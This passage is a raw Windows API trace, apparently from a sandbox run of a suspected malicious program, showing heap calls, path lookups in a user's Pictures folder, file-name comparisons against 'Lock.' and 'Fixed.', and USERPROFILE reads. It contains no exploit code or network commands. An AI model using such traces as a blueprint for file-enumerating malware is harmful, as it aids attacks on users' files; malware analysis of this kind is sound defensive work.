(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a74ec8 [0209.891] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/EHKlEyoM3xoIg8ms.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\EHKlEyoM3xoIg8ms.jpg", lpFilePart=0x8cf650*="EHKlEyoM3xoIg8ms.jpg") returned 0x2d [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ec8 | out: hHeap=0x2af0000) returned 1 [0209.891] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EHKlEyoM3xoIg8ms.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ehkleyom3xoig8ms.jpg")) returned 0xffffffff [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.892] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0209.892] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.892] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F3GpsjDs7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3GpsjDs7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GpsjDs7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="psjDs7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sjDs7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jDs7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ds7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0209.893] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77be8 [0209.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F3GpsjDs7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3GpsjDs7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GpsjDs7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="psjDs7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sjDs7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jDs7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ds7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7t.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0209.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0209.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.894] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.895] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0209.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0209.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.895] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.895] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0209.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.897] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.897] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0209.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0209.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0209.899] RtlAllocateHeap 